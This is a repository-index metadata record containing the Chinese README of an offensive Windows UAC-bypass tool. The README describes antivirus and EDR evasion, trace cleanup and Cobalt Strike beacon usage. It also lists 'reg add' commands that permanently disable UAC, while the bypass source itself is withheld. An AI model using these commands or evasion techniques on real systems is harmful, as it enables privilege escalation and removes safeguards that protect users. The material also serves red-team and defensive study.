{"id":19890175,"url":"https://github.com/adminisme/bypassuactools","last_synced_at":"2025-03-01T05:15:01.473Z","repository":{"id":105754452,"uuid":"475054826","full_name":"Adminisme/ByPassUACTools","owner":"Adminisme","description":"Windows 平台下的UAC(User Account Contro) 绕过工具。","archived":false,"fork":false,"pushed_at":"2024-06-24T08:02:02.000Z","size":1327,"stargazers_count":56,"open_issues_count":0,"forks_count":7,"subscribers_count":5,"default_branch":"master","last_synced_at":"2025-01-11T19:30:44.211Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":"","language":null,"has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/Adminisme.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2022-03-28T15:05:58.000Z","updated_at":"2025-01-02T18:39:25.000Z","dependencies_parsed_at":"2025-01-11T19:27:08.546Z","dependency_job_id":"c27f9dcc-0337-4a39-b50e-184e3ed82db4","html_url":"https://github.com/Adminisme/ByPassUACTools","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Adminisme%2FByPassUACTools","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Adminisme%2FByPassUACTools/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Adminisme%2FByPassUACTools/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Adminisme%2FByPassUACTools/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Adminisme","download_url":"https://codeload.github.com/Adminisme/ByPassUACTools/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":241317692,"owners_count":19943203,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-11-12T18:13:12.298Z","updated_at":"2025-03-01T05:15:01.467Z","avatar_url":"https://github.com/Adminisme.png","language":null,"funding_links":[],"categories":[],"sub_categories":[],"readme":"# ByPassUACTools\n\n![Author](https://img.shields.io/badge/Author-Trim-blueviolet) ![Author](https://img.shields.io/badge/Author-xiaoxiong-blueviolet) ![Bin](https://img.shields.io/badge/ByPassUACTools-Bin-ff69b4)  ![build](https://img.shields.io/badge/build-passing-green.svg)  ![language](https://img.shields.io/badge/language-C-blue.svg)\n\n### 简介\n\n- **Windows 平台下的UAC(User Account Contro) 限制绕过工具。**\n\n- **Windows 7 及以上版本系统（含Server版）。**\n\n- **UAC防护级别小于或等于默认等级、当前进程的用户权限为管理员组（Administrators）用户权限。**\n\n---\n\n### 免责说明\n\n- **避免恶意使用此工具，故不提供完整的工程项目源码和二进制文件，主要分享和提供思路供大家参考。**\n\n---\n\n### 设计思路\n\nUAC（User Account Control，用户帐户控制）是 Windows Vista 版本后开始引入的一种系统安全机制，它在操作系统中定义了多种用户访问的安全级别，可以防止在非管理员权限下的存在恶意应用程序或恶意进程对系统范围（管理员级别）的配置进行访问或资源调度。\n\n1. **自动检测当前系统运行环境:**\n     - 自动检测当前系统是否开启UAC与当前UAC等级是否满足Bypass条件；\n     - 自动检测当前进程所属用户的权限是否为管理员权限；\n2. **主要核心功能**:\n     - 支持以ByPass UAC的方式执行一个指定的二进制程序；\n     - 所有内置的ByPassUAC模块在执行时不触发EDR-Agent和杀毒软件的告警；\n     - 具备痕迹清除，在执行特定的ByPassUAC模块后，在退出前会清理落地的文件和恢复已修改的配置；\n\n---\n\n### 功能演示\n\n#### 1、以ByPass UAC的方式执行一个指定的二进制程序\n\n\u003e 在具有安全软件和默认开启UAC的系统环境下，启动`regedit.exe`为例\n- 直接运行会触发UAC桌面弹框提示\n\u003cimg src=\"imgs/image-20220328164120370.png\" alt=\"image-20220328164120370\" style=\"zoom:33%;\" /\u003e\n\n- 通过`ByPassUACTools.exe`执行`regedit.exe`，则可以绕过系统UAC，同时该行为可以躲避杀软的系统防御检测。\n\n\u003cimg src=\"imgs/image-20220328164148608.png\" alt=\"image-20220328164148608\" style=\"zoom: 50%;\" /\u003e\n\n#### 2、支持CobaltStrike Reflective DLL内存加载，绕过UAC运行指定的可执行文件（支持参数）\n\n\u003e 调用`C:\\Windows\\System32\\cmd.exe`，附加参数执行指定的命令为例\n\n```\nbeacon\u003e bypassuactools \"C:\\Windows\\System32\\cmd.exe --parmas /c echo test \u003e C:\\test.txt\"\n```\n\n#### 演示效果如下：\n\n- 是否开启UAC\n\n```\nbeacon\u003e shell reg query \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\" /v \"EnableLUA\"\n```\n\n- 查询UAC等级\n\n```\nbeacon\u003e shell reg query \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\" /v ConsentPromptBehaviorAdmin\n```\n\n- 执行需要管理员权限的特定命令进行测试\n\n```\nbeacon\u003e shell C:\\Windows\\System32\\cmd.exe /c echo test \u003e C:\\test.txt\n\nbeacon\u003e shell dir C:\\test.txt\n```\n\n- 通过bypassuactools执行特定命令\n\n```\nbeacon\u003e bypassuactools \"C:\\Windows\\System32\\cmd.exe --parmas /c echo test \u003e C:\\test.txt\"\n```\n\n- 确认执行成果\n\n```\nbeacon\u003e shell type C:\\test.txt\n```\n\n\u003cimg src=\"imgs/image-20220328143949418.png\" alt=\"image-20220328143949418\" style=\"zoom:25%;\" /\u003e\n\n\n\n### 其他：\n\n#### 1.增加了永久关闭UAC的方法 ：\n\n##### 1.1 演示效果如下：\n\n\u003cimg src=\"imgs/image-20220328212625548.png\" alt=\"image-20220328212625548\" style=\"zoom: 40%;\" /\u003e\n\n##### 1.2 设计原理\n\n\u003e 注解：系统UAC的配置均在该注册表路径下：\n\u003e\n\u003e https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-gpsb/12867da0-2e4e-4a4f-9dc4-84a7f354c8d9\n\n```\nHKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Policies/System\n```\n##### 关键的注册表键说明：\n\n- ConsentPromptBehaviorAdmin (UAC强度级别)\n\n```vbscript\nreg query \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\" /v \"ConsentPromptBehaviorAdmin\"\n```\n- EnableLUA (启动UAC策略)\n\n```vbscript\nreg query \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\" /v \"EnableLUA\"\n```\n\n- PromptOnSecureDesktop (禁用UAC桌面弹框提示)\n\n```vbscript\nreg query \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\" /v \"PromptOnSecureDesktop\"\n```\n\n##### 具体操作：\n\n\u003e  无需重启即可生效\n\n```\nreg add \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\" /v \"ConsentPromptBehaviorAdmin\" /t reg_dword /d 0 /F\n```\n\n```\nreg add \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\" /v \"EnableLUA\" /t reg_dword /d 0 /F\n```\n\n```\nreg add \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\" /v \"PromptOnSecureDesktop\" /t reg_dword /d 0 /F\n```\n\n\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fadminisme%2Fbypassuactools","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fadminisme%2Fbypassuactools","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fadminisme%2Fbypassuactools/lists"}